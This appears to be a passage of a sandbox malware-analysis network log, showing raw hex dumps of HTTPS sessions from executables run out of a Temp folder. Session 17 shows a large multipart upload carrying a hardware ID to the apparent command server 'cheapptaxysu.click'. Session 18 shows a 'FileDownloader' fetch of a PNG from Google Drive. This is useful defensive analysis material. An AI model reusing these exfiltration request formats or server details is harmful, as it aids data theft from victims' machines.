2024-12-22 01:16:56 UTC	1390	IN	Data Raw: 2d df 36 3e 10 0c 06 b3 0c c3 f8 4b c3 76 40 66 4a 3c 59 33 8f 66 b1 55 ab 56 ed b7 69 db f6 1f 8e b9 e9 b6 7d 9e cb ca 70 7d 53 f3 d6 4b 29 57 d2 0b 7b ee 92 3f cb 64 e9 c1 55 0d c3 93 ff db 19 bf 74 c6 61 00 47 7a dc ed 2c 0e f7 13 6c ee f5 5b 5c 76 59 9d c5 ed 98 62 fd 4d d2 75 a1 51 e9 94 d4 22 96 55 35 b9 0a 7b 33 33 4f d9 be 7d 7b 7f af d7 fb 44 2a 25 b5 b6 24 f2 81 f7 7a bd 65 35 35 35 85 91 bf 47 c3 0d b1 cd 69 0f 60 7a be c2 6b 1c 9c d4 10 fd e2 0a 85 fe 5b b7 34 10 08 8c 35 0c a3 12 c0 03 26 93 da 02 c3 30 0a 54 55 9d 94 4a 49 ad 25 6c 38 6e 6f 47 d3 88 c8 88 bc 57 15 45 19 c8 cc 97 01 f8 b5 85 43 0a 88 a8 34 10 08 2c ab a8 a8 f8 2d 4a ef cb 05 b8 d4 86 a4 16 71 24 3a fd 74 8d 0d ed 98 62 7d 62 53 8c 64 95 16 4a 19 eb 6a b7 e3 97 d0 7f 17 d7 d5 Data Ascii: -6>Kv@fJ<Y3fUVi}p}SK)W{?dUtaGz,l[\vYbMuQ"U5{33O}{D*%$ze555Gi`zk[45&0TUJI%l8noGWEC4,-Jq$:tb}bSdJj
2024-12-22 01:16:56 UTC	1390	IN	Data Raw: 45 39 d3 09 73 6b 8d ec b9 9a a1 e8 d6 fb e9 e2 5b f8 a6 a7 65 25 f5 36 c9 37 65 2b 88 e7 8b 0e c3 3c 7a 17 be 5b e5 fc 5a 23 4a e3 1e 5b 23 9f 36 1d e0 87 2d 3a fb 66 80 4f c6 99 b7 ae b5 e8 fc 09 b1 e7 8f ce c6 4b f5 bf 80 74 40 4f 82 c8 8e ae bf 64 17 c6 bd a2 43 30 8d f9 3e d1 21 38 4c fa ce b1 ed ce a7 5d 05 a6 9b 93 3c 2d f4 15 14 fa 2d 7c da a7 49 3c 67 52 d8 93 d8 7c 5a 15 08 56 5d 31 38 c9 0e 84 8c bf 89 0e 42 4a b2 e8 07 37 25 e6 da 56 c0 37 6d 81 e8 20 1c 25 cd b6 ad 69 d6 59 d3 ee 00 f1 68 00 5f b6 f2 4c 0c c6 53 a8 e5 21 38 73 5a 30 49 d1 25 95 7d dd 74 e6 07 c4 dc 57 61 a3 48 f2 3e 57 13 b9 75 ad 64 15 c3 b8 1a 80 c3 57 1a f2 b5 72 b4 60 4f 9c 26 1b 8d 9a 56 ac 2d c5 0e 56 c1 b8 06 c0 0f f1 1c 1a b9 42 c8 20 d7 3b 30 78 18 ce 9a 7e 31 ce d7 Data Ascii: E9sk[e%67e+<z[Z#J[#6-:fOKt@OdC0>!8L]<--\|I<gR\|ZV]18BJ7%V7m %iYh_LS!8sZ0I%}tWaH>WudWr`O&V-VB ;0x~1
2024-12-22 01:16:56 UTC	1390	IN	Data Raw: c5 96 ce 8f ee 59 d3 1b 5a 86 bb fe b5 84 10 b1 ac aa 52 ee d8 e2 4c f4 25 b6 9f 3b 3e b5 7a c9 cf db 1a 7d a2 aa 5f 02 b8 a4 91 33 f8 d1 4b af 59 6f 5c 80 42 08 53 25 27 c9 1d 5b 9c 89 fe c4 26 c2 e7 83 89 6d 91 58 75 29 98 2e fc e3 77 05 03 bb da 5a c1 4a 0a da 58 12 71 8e 2d 1d 99 49 6d 71 76 62 9a d9 51 8a 78 33 60 e8 79 00 2e 86 82 6e 0a 73 87 4b 1e 71 b6 fe 5d 2f 47 d3 c7 fb 6a 25 b1 c5 19 49 6c e2 a7 16 bc 6a c3 d1 c3 7f 04 f1 dd 40 75 5f 30 d5 95 71 5c 15 07 eb fe f9 b9 54 8b f5 65 e4 8c eb 06 9f e5 1f f8 c3 98 9d 66 84 2c e2 c0 95 43 4e 57 34 ba 97 81 3f 02 7c 5e dd d7 f8 78 3b a0 d2 63 15 f8 78 c5 d7 4d 9f 5b 5d 25 a5 c8 38 23 bf 70 71 1c 33 21 67 dc 9f 51 76 e8 3b 10 ff 0b c0 65 7a de 1f e5 be da 0e 00 46 c3 e2 fb 06 1f 3b 5f 47 8e 33 12 16 d5 Data Ascii: YZRL%;>z}_3KYo\BS%'[&mXu).wZJXq-ImqvbQx3`y.nsKq]/Gj%Ilj@u_0q\Tef,CNW4?\|^x;cxM[]%8#pq3!gQv;ezF;_G3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49885	104.21.67.146	443	5040	C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:16:54 UTC	366	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=WDQ0LOOQQN Cookie: __cf_mw_byp=Y0MnBaVocaknWr71LkrwO587RjHDDvDl2Mw1arBBHbQ-1734830196-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 549427 Host: cheapptaxysu.click
2024-12-22 01:16:54 UTC	15331	OUT	Data Raw: 2d 2d 57 44 51 30 4c 4f 4f 51 51 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 57 44 51 30 4c 4f 4f 51 51 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 44 51 30 4c 4f 4f 51 51 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 0d 0a 2d 2d 57 44 51 30 4c 4f 4f 51 51 4e 0d 0a 43 6f 6e 74 65 Data Ascii: --WDQ0LOOQQNContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--WDQ0LOOQQNContent-Disposition: form-data; name="pid"1--WDQ0LOOQQNContent-Disposition: form-data; name="lid"CZJvss--geopoxid--WDQ0LOOQQNConte
2024-12-22 01:16:54 UTC	15331	OUT	Data Raw: 07 49 6d fc d4 75 8c 89 13 dd cb 36 7e 60 f2 29 70 3c 9c aa 7c ff 3c 02 ea 0d 51 1a 0a df 8d 1b 06 3c c9 31 b1 fe 3f 97 11 f6 55 00 4d 5c ce cd b6 f8 cb 80 ed 93 7c 74 1a 5b 41 cc 74 81 ee 69 2c 10 bb a2 0e 2b e5 13 92 43 7c 0b ce 3a 0b 0a 04 48 13 d7 6f 8c 9f 88 13 a0 cd 17 ab 4f c5 df 09 b7 db 88 08 38 16 b6 97 61 f4 87 90 ad b3 f3 41 94 71 10 5e 1f 94 74 04 f9 4f e6 41 70 36 54 29 85 3f d2 0c 17 ee 07 0e 5a 9d 80 5c cd f3 16 44 aa 6f 5c 5a 14 b8 f1 6f cb c7 01 97 be b1 be 77 69 23 f6 43 4e ef d0 a1 9a f5 1b 57 a9 50 81 7d 45 87 49 c9 d5 c4 10 d7 c9 b4 28 14 dc bb df 47 c4 08 13 8a 4c 3b 31 34 2d 07 03 92 fc e3 a9 b9 a0 38 d8 d1 65 cd a1 41 03 3f 1d b0 74 f0 7d 9f 1e d8 6e 2c bf fb e6 d4 e8 e0 c5 dd fd de 37 4e f6 4a f7 4e 8e 29 da bf 75 28 a9 ca 7e 63 Data Ascii: Imu6~`)p<\|<Q<1?UM\\|t[Ati,+C\|:HoO8aAq^tOAp6T)?Z\Do\Zowi#CNWP}EI(GL;14-8eA?t}n,7NJN)u(~c
2024-12-22 01:16:54 UTC	15331	OUT	Data Raw: 63 9a a5 43 06 f2 7c ac e4 a4 2e 2d b5 4e a4 d4 4b 74 61 6a b5 14 de b6 06 e3 03 86 6b a9 26 dc ef 1f c7 e3 ca 46 27 a7 a7 a3 eb f4 27 94 9c 55 c0 4e c7 08 88 20 b7 0f 4f b5 0c 24 aa 28 29 46 c4 fd 7a 7f e2 98 7c a4 81 53 97 21 ce ef b8 0a 9f 1f 2f 5f ad ab 83 7b d4 58 f6 eb 5d 06 81 ff ae 9a f5 b4 c0 ab 12 1e 1e cd cf 23 1e 8b e6 17 5a 53 ea 5b 12 da d9 24 a7 fd 6a a3 f6 51 1c 41 0e 25 b4 07 67 f2 50 77 49 bc 52 e5 95 60 6a cb 9d d0 da 3d f9 93 72 fd fc df d5 b3 26 af 8c fe 3e 1b 7d 35 3d 64 1f df dd 20 d1 3e 6a b3 e1 f3 c6 68 d8 5f fc 97 62 ed 54 08 3f fa 27 b3 7b dd e9 8a df a3 4c 43 44 67 96 68 56 6e 8b ac d0 fa 70 ec b1 21 a8 3b 6a 4b e4 e9 8e 02 95 74 96 f2 04 2f 5d 24 43 e2 05 3b 58 34 5d 8c 39 be 39 cb ed 7e cf d1 6f 35 c1 7b e8 ff da 61 da da 49 Data Ascii: cC\|.-NKtajk&F''UN O$()Fz\|S!/_{X]#ZS[$jQA%gPwIR`j=r&>}5=d >jh_bT?'{LCDghVnp!;jKt/]$C;X4]99~o5{aI
2024-12-22 01:16:54 UTC	15331	OUT	Data Raw: 69 4c 33 7a 79 eb 59 2c 55 8c 5d 76 73 37 3d ca fa d3 b3 bd 9f d0 30 a3 72 c9 e5 c0 c6 8b 7e 81 9e cc 8a cf 23 35 15 2f ff 61 31 b9 f9 b1 a7 ab a7 56 fe 38 31 a9 cd e7 84 ba c6 7e 6e fd a6 fa 1a bb db bc e2 5c fb b4 3f 93 9a b7 17 38 0a 17 01 cc ad d3 c0 f1 c2 0e 9e 9d 3a bd b2 85 c2 2c b7 61 09 56 e9 81 36 0e 47 1d 1f 6e f3 75 fd d1 bd 08 ab 09 b9 c9 02 69 20 1b 13 72 cb 6b 1e a2 db 85 da 1b 7c 50 c7 cf f4 be 21 b7 99 3c 0d b7 d0 02 0e 1f 7f 6d 20 3e c2 14 78 c8 ff 7f 47 a0 23 99 a3 10 28 43 43 4d 06 e0 5a 59 2e 22 b2 24 22 35 4b 51 e0 42 c8 53 6d be 35 ba b8 2a f6 d5 2b c5 21 ad 1f 80 b0 87 e8 88 79 86 25 7e 99 74 f5 e0 06 16 3f 31 8c 52 41 81 c4 8f 9c 10 9b 08 9b c4 50 c3 26 ab d2 20 da f8 6c e3 82 ab 01 eb 2e dd f5 c6 4d e3 de 19 c3 b5 3e 62 4c e4 60 Data Ascii: iL3zyY,U]vs7=0r~#5/a1V81~n\?8:,aV6Gnui rk\|P!<m >xG#(CCMZY."$"5KQBSm5*+!y%~t?1RAP& l.M>bL`
2024-12-22 01:16:54 UTC	15331	OUT	Data Raw: 0e a2 2c 85 49 3d e3 a0 ff 17 15 2e d3 97 e7 bd b4 ed 69 84 79 be 8c 7c ed 02 98 4a 98 13 f2 6a 7e 8f 19 cb 48 34 b5 27 fe 1b 89 40 53 43 c5 f6 48 63 e7 51 9e 68 f3 76 94 b9 93 c6 af cb f8 97 7e 5b ef 41 74 c7 b9 00 56 1f 82 c4 32 02 98 be e9 74 9b 35 33 bb f3 e4 ea 09 ce 35 03 3c 7e 4a 37 f8 ab 64 20 96 07 23 8c e9 55 18 47 33 a2 8a ba 8d e6 64 3f 58 33 9a 8c b1 e1 42 8d f2 56 ee 99 4e 49 a3 23 e3 77 66 86 2a e2 37 5f 0a 50 f8 39 77 46 83 b1 f5 a4 da eb 4c 66 c4 df 83 e4 3a 89 48 e3 3a 04 3b 10 26 51 8e ba 44 a4 f5 a1 19 71 e5 ea e9 f0 3d be a5 a7 7c 2a 92 c9 96 f6 19 09 38 21 c1 fd 8c 92 3d bb 74 b8 a4 ef b2 a6 37 9e 49 44 1e e6 33 a9 fa b1 d2 a4 75 73 35 b3 75 8b 3b ac 49 07 23 04 5e 0f a8 8d 67 bd e1 02 7f be 8e 3d 89 ac 31 d2 cd 4a e0 15 02 b7 27 a0 Data Ascii: ,I=.iy\|Jj~H4'@SCHcQhv~[AtV2t535<~J7d #UG3d?X3BVNI#wf7_P9wFLf:H:;&QDq=\|8!=t7ID3us5u;I#^g=1J'
2024-12-22 01:16:54 UTC	15331	OUT	Data Raw: cd 54 8e fb 91 a8 1b 4c 8a 23 7d 7b 18 f5 fc b0 ac 28 70 6c 92 1b 8a d4 f9 fa 6d c9 32 bd a2 a3 29 9e 73 45 58 fc c7 df dc 0e 57 ec 1d 38 c8 1f 3a 81 09 f5 47 fd 58 c0 c5 66 d5 99 d0 cc c3 26 42 24 38 f3 4f 02 2b bd 58 09 2a d7 c6 c1 b2 6f 7a 45 61 f6 6e 19 d8 10 03 bf e4 62 d7 47 89 0e b6 bd 3a 4b ac ae ef 96 b0 bd f0 c2 8b a7 ff 3b 4c 73 3d 03 7b 87 4b 5a 84 fe 0a b1 13 55 65 22 a9 b0 cd 58 ad 28 cb 6e 5d ad f6 19 ca 50 f7 c3 bc d7 07 f7 67 9f b9 80 be b9 c6 38 b3 33 53 e4 2a 74 93 aa ae b9 8c 9e 45 2f e7 cc d8 1c 25 d3 59 4b aa b4 31 00 de a2 19 f3 ac 3e 52 9a 08 20 ec 11 8b 52 e2 66 37 6c af 0d fe bb 2e 39 52 c3 ec 9c fa 99 20 77 dc 19 de 07 1a 54 76 f6 3b cc b6 40 18 70 48 8a 21 df 00 53 c3 2e 71 81 07 e2 0c 3d 44 da dd bd be ef fd d6 ec dd 26 26 55 Data Ascii: TL#}{(plm2)sEXW8:GXf&B$8O+XozEanbG:K;Ls={KZUe"X(n]Pg83StE/%YK1>R Rf7l.9R wTv;@pH!S.q=D&&U
2024-12-22 01:16:54 UTC	15331	OUT	Data Raw: e9 ed f3 df 6e 54 93 d2 95 15 ff b4 8b 38 02 0c 9b c2 21 ec 28 2e 6a 72 c4 47 eb f9 c7 b1 78 97 3b 81 df 8e 3c 5a da ca f4 32 de 27 b2 e1 e5 28 a0 50 dd f3 d2 1b 53 34 7c 19 87 47 7c ff 9d 8e 1d 2b 5e 30 27 f1 7f dd 6c 47 d4 01 69 a7 2a a3 9b d9 e6 a9 be 4f 1c 5c f9 27 75 47 ac 33 0f a2 48 10 26 94 f6 d8 23 c7 e6 6b 21 30 fb 2c 14 22 ca 65 29 43 8e c2 bd 27 39 5a e7 d2 b8 f7 7a d0 31 7d 78 97 8b c4 40 de fb 91 16 6d 9b 9a b5 a2 59 1e 72 25 6b 9a 99 23 d4 29 1a ee 22 59 1c 51 7d 04 58 8c 66 6a a0 be 63 7b ff d2 86 2b 1a ae e2 20 b5 06 6c ec d5 c8 72 c8 da d1 5e 02 f0 d4 38 41 c4 a1 10 3c ab d8 39 3b 4b 64 92 75 78 f0 fb 15 4a e5 ae db 4a cc 91 09 96 a5 58 16 36 ec e7 af 56 ff df 05 be cc c3 cc 92 e2 63 c2 0b 97 63 32 75 30 c6 e7 c9 be bc b3 32 71 86 e2 58 Data Ascii: nT8!(.jrGx;<Z2'(PS4\|G\|+^0'lGi*O\'uG3H&#k!0,"e)C'9Zz1}x@mYr%k#)"YQ}Xfjc{+ lr^8A<9;KduxJJX6Vcc2u02qX
2024-12-22 01:16:54 UTC	15331	OUT	Data Raw: 42 4a 82 8c 15 db 88 47 07 87 f3 17 0d 6c 7a b3 8b 3b da d1 6d 7f 0c 05 83 c0 23 28 c3 61 6f e9 a5 62 b9 94 11 97 53 9b d2 08 cf 65 e7 4c e3 26 f4 29 44 68 24 d6 0b a9 4e 5d cd 4e dd f5 06 03 5c ce af cb b1 e2 9d f1 f2 c1 df 7d 61 6d 7c 71 d2 37 df a1 fc 6b 53 19 2c bd 1d 7b 59 44 46 13 ba 49 56 11 c1 54 ec 35 48 d8 a8 e2 10 ee e5 98 ee ef 1f 89 a2 28 8c de 5a 25 57 1e e7 e8 d5 57 73 53 fe 01 3d 8a 90 86 d1 31 ad 95 ea 65 0f 6b 4b 9c 98 c8 b0 fa 94 10 ce ed e3 4f 2e b0 2a 1d 9c 3a 92 7b 24 34 f9 c8 c9 f3 ff 4e 9b b1 48 eb a2 3b ec 88 92 6f 6c b1 6d b3 72 51 2b 3d a7 a1 8c 6c 9f c4 9d 17 97 a6 0d 47 3f d9 41 9f 79 9e c0 67 b1 60 5e b8 2f fd 1c d0 5a 38 40 2c 41 20 8e f2 6e ca f6 5f 49 1b c0 02 72 38 74 8e 0f 94 5b b9 ff f2 76 3f f9 04 74 1e e1 c4 d8 a4 45 Data Ascii: BJGlz;m#(aobSeL&)Dh$N]N\}am\|q7kS,{YDFIVT5H(Z%WWsS=1ekKO.*:{$4NH;olmrQ+=lG?Ayg`^/Z8@,A n_Ir8t[v?tE
2024-12-22 01:16:54 UTC	15331	OUT	Data Raw: 80 d3 76 f4 03 b2 b8 73 a8 5d 86 a8 0e fd c8 1f ef 7c b7 2e 6b cb 4f 54 9b 13 34 05 80 04 56 2a d5 3d 4f 8d b0 a0 a7 67 84 3e 7a b7 41 7f e8 c4 80 6f fa 93 d6 ee cf 0f f3 cd 04 79 b7 e6 ed 3f 19 51 ff 77 4b 4c 10 84 f8 2c 2e a2 81 36 fe 0a 0e bc 45 17 0a a0 86 c9 64 c9 7f 82 d3 b4 7d 12 37 8f d5 58 1a f3 fb ea 20 18 30 e0 04 39 47 96 da 8b a2 07 38 14 2a 0d 73 25 0f f7 4b 8d b8 c6 63 47 54 e9 02 18 6d 96 67 34 35 18 e0 d7 1f b3 c6 56 00 9f 8a f9 e0 71 91 37 5b 71 fb a6 ad d0 bc 76 3e 7c 66 ce 54 cd 89 53 9b cf 2a 52 8d 79 05 c7 c4 ef 41 b0 51 b7 fe fa 15 07 09 d4 f5 84 09 08 dc 20 e0 1a 70 f5 ca 51 21 bb a9 fc 00 c2 41 2b c4 bd a1 3b b9 76 ad 39 b3 64 17 1b 53 a7 11 ec 65 4b bc 07 e6 35 3a 89 90 74 b0 c6 18 9d b4 89 28 c0 6d 9f cd 49 a0 0b 08 fc 9a b2 29 Data Ascii: vs]\|.kOT4V=Og>zAoy?QwKL,.6Ed}7X 09G8s%KcGTmg45Vq7[qv>\|fTS*RyAQ pQ!A+;v9dSeK5:t(mI)
2024-12-22 01:16:54 UTC	15331	OUT	Data Raw: 0e ea 99 7c 91 ce 23 27 23 e8 2f 6f 4a 4e 98 5a 7e 8a e6 df e0 f3 21 a0 6b af a3 09 67 f8 af 49 0a 3a ce eb d3 04 be da ff df 4b 6f ac e3 f4 4e 66 42 7c 4c 62 d9 4e 43 5e e6 5d 35 2f 41 c4 1b b3 e8 b1 c6 44 c0 b0 3b 0a f2 0f cf a8 40 f9 bf cc 98 ee 0e c3 17 af 7e 11 ad dc 79 b3 98 ad 81 80 c8 2f ae a9 a7 bd 59 57 f3 c3 19 09 f9 4b 35 13 2e 53 f0 44 6d 13 a9 02 ad 2e 60 d9 ba 23 f4 28 0c c3 d4 a0 18 b5 42 53 9c b7 fb f5 e5 22 95 94 09 00 3b 39 7a c7 f9 1b 43 be b3 03 3d 3d a4 0f b8 ce 1f 18 ad 09 ef b9 2d e0 18 b4 f0 6a de 5e 85 d8 42 cf f2 18 ac 94 1b 2c b9 eb 92 2f b6 30 10 26 15 e9 dd ac dc 31 b6 54 ac 4d 8f a2 d6 cd 7a e4 85 20 dc 0b 18 fb 73 7d ec 15 61 10 e2 3d 37 2b 0f 87 f9 41 af 35 93 26 3e ec 49 81 45 1d 3f 51 25 59 b3 7d 15 dc f7 92 41 4e bb c9 Data Ascii: \|#'#/oJNZ~!kgI:KoNfB\|LbNC^]5/AD;@~y/YWK5.SDm.`#(BS";9zC==-j^B,/0&1TMz s}a=7+A5&>IE?Q%Y}AN
2024-12-22 01:16:56 UTC	1135	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:16:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8d817lnpaumet3q4kvn8o7hn2n; expires=Wed, 16 Apr 2025 19:03:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TYkc3HdumqBFqGnzhfJG7CiIaY0brtAzUDxXMkvnpHQ2C8q7fy6UVuqIUU5IpbzlSkk9AxqDp7ltYdT%2FVMX7ZAZyxZMQ780ublD%2BlIDEIX3YvrwX6em2teCwdgWvbcdk3UHS%2BIo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c44e6da128cc0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2025&min_rtt=2014&rtt_var=778&sent=300&recv=573&lost=0&retrans=0&sent_bytes=2843&recv_bytes=551991&delivery_rate=1385199&cwnd=222&unsent_bytes=0&cid=e5444e4a495c1f78&ts=2385&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49884	142.250.181.65	443	4628	C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:16:54 UTC	192	OUT	GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1 User-Agent: FileDownloader Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-22 01:16:58 UTC	4919	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFiumC6QTnk-l6NKHOxp1NrGu8hQJBFQ7ONxvo8zYB1bBEiJvmKd58KlIqhlvo7vGGvbkOvCVtIKux8 Content-Type: image/png Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="output.png" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 156917 Last-Modified: Mon, 11 Nov 2024 02:30:33 GMT Date: Sun, 22 Dec 2024 01:16:57 GMT Expires: Sun, 22 Dec 2024 01:16:57 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=h6mvlQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-22 01:16:58 UTC	4919	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 b6 00 00 01 b6 08 06 00 00 00 13 09 a3 70 00 00 80 00 49 44 41 54 78 9c ec dd 07 7c 14 65 fa 07 f0 df 33 9b 0a 09 bd 9d 15 44 20 64 77 36 80 d8 d0 53 9a dc 59 00 5b d6 ce a9 e7 e9 9d 05 b0 23 2a 4c c0 82 67 c5 72 96 bb bf 9e e8 a9 24 58 41 3d 95 66 c3 16 85 ec ec 12 8a 8a 9e 05 0b 9d 00 29 bb f3 fc 3f bb 49 ee 28 d9 64 76 b3 33 ef 6c f6 fd 7e 3e 7e 3e b2 bb 33 ef 93 64 77 9f 79 cb 3c 6f 06 24 49 b2 ce a8 d3 ba 82 c2 c7 2b 8c 61 0c 14 02 74 08 08 3d c0 68 0f 80 40 a8 02 d3 06 10 af 23 c6 2a 03 fc 11 80 25 58 f4 da cf a2 43 97 a4 54 45 a2 03 90 a4 36 67 cc 98 f6 08 e5 fa 88 30 01 c0 71 00 94 04 ce f2 11 13 3d 03 64 3e 87 85 65 5b 2d 88 52 92 da 2c 99 d8 24 29 59 4e 3c b1 03 ea 32 27 12 d3 24 00 dd 92 Data Ascii: PNGIHDRpIDATx\|e3D dw6SY[#Lgr$XA=f)?I(dv3l~>~>3dwy<o$I+at=h@#%XCTE6g0q=d>e[-R,$)YN<2'$
2024-12-22 01:16:58 UTC	4861	IN	Data Raw: aa aa 13 4c 25 b5 58 26 5c bf 63 68 76 d7 cd 7b 27 b5 86 36 04 d4 e8 92 a4 ff 71 b9 5c 31 df 83 59 59 59 09 ed b7 e6 76 bb ab 54 55 d5 5c 2e 97 4a f1 d7 58 ed 07 60 7e 43 79 ae c2 44 da 97 12 27 13 9b 43 31 33 05 02 81 09 86 61 7c 19 b9 02 8c e3 8a b1 d1 97 cc ec f3 7a bd a3 54 55 4d ca 0e c1 2e 97 ab c9 2f 08 22 11 c5 27 25 e9 7f 9a 9b 63 ab ae ae 6e d5 46 a2 85 85 85 6b 3d 1e 8f cf 30 8c d1 09 ec 8e d1 58 9e 6b 76 79 79 79 c7 d6 c4 21 99 27 13 9b 03 05 02 81 c3 03 81 c0 32 66 7e 3a c1 31 fe 92 9c 9c 1c 8f d7 eb 4d 6a 25 ff 70 38 dc e4 17 84 ec b1 49 a2 35 d7 63 cb cd cd 4d ca 0e d9 45 45 45 8b 36 6c d8 30 84 99 2f 03 f0 6b 1c 87 66 02 98 98 9d 9d fd 95 ae eb 93 4a 4b 4b e5 e7 c5 62 32 b1 39 c8 aa 55 ab f6 6b 28 83 f5 09 80 a3 e2 3c dc 00 a2 bb 10 1f aa Data Ascii: L%X&\chv{'6q\1YYYvTU\.JX`~CyD'C13a\|zTUM./"'%cnFk=0Xkvyyy!'2f~:1Mj%p8I5cMEEE6l0/kfJKKb29Uk(<
2024-12-22 01:16:58 UTC	1321	IN	Data Raw: e9 76 bb 53 a2 8c 51 20 10 18 bb 71 7b d5 a3 7f 7f 7b e9 fe cf bf ff 31 0c 13 c3 93 5d 3b e4 1b 63 06 b9 9f ef cf 35 17 6a 9a e6 8c 25 e4 a3 c6 17 82 30 48 61 2e 00 63 00 13 f6 03 a8 3d c0 1d 81 68 45 ff 1a 10 aa 86 f4 39 b8 5f df 5e 3d 3a 1c dc a3 1b 0e e9 d9 1d 45 bd 0f 42 7e 6e 4e a4 c7 36 d3 e3 f1 d8 ba 22 4f b8 52 2d 0b c0 53 00 9d 2b a0 f5 1d 60 f6 e1 2c ed 0d 01 6d ff 57 ea 24 b6 46 a5 33 fb 80 8d 1b 41 f8 03 80 9c 24 9c 31 08 c2 9d e0 81 2f a4 fb cd d7 66 04 02 81 a7 98 f9 c2 bd 1f 67 e6 81 5e af d7 f6 b1 f4 78 24 38 ec b8 25 72 2d bc 61 c3 86 47 46 8c 18 e1 8c 2f 7b 93 2a 2a 2a da 2b 8a 72 7d e0 bb 1f a6 ce 7a 71 41 a6 ff 1b 73 53 a0 9e 83 f6 af 3a a1 c8 f3 97 fb 26 5f fe ac e5 41 ee 6d ec d8 76 d8 49 a7 29 84 93 99 69 04 80 5e 89 9c 46 21 c2 c0 Data Ascii: vSQ q{{1];c5j%0Ha.c=hE9_^=:EB~nN6"OR-S+`,mW$F3A$1/fg^x$8%r-aGF/{***+r}zqAsS:&_AmvI)i^F!
2024-12-22 01:16:58 UTC	1390	IN	Data Raw: 67 56 bc b8 64 c9 01 31 5f 38 fa d4 e1 44 ca 62 27 27 35 d4 6f 18 76 3e 6d aa 7b 13 27 9e d8 41 74 2c 52 eb a4 65 62 4b ab 6a 04 49 16 eb a2 40 51 14 5b 13 5b 45 45 c5 90 40 20 b0 ac 61 4b 19 b3 73 69 5f 30 73 a4 67 39 21 5d e6 d2 e2 e1 76 bb bf 54 55 f5 94 11 ea c0 71 2f df 34 e9 1b 33 7b bf ed aa ad c5 cb 1f 97 7b a7 fc df f3 df 4c 7b ec c9 07 96 2c 59 b2 67 f1 84 d1 e3 4e 26 e6 7f 03 e8 68 71 f8 49 c2 23 a9 36 eb 1d 99 dc 52 5b 5a 26 36 d9 63 4b 9c e8 1e 9b df ef ef ac eb fa 6c 45 51 3e 8d 63 2e 6d 33 80 c9 95 95 95 47 78 bd de 8f 2c 0e 31 e5 79 3c 9e f9 a1 ea ea c2 cb 7f 3f b2 64 de f5 57 d4 1c ef 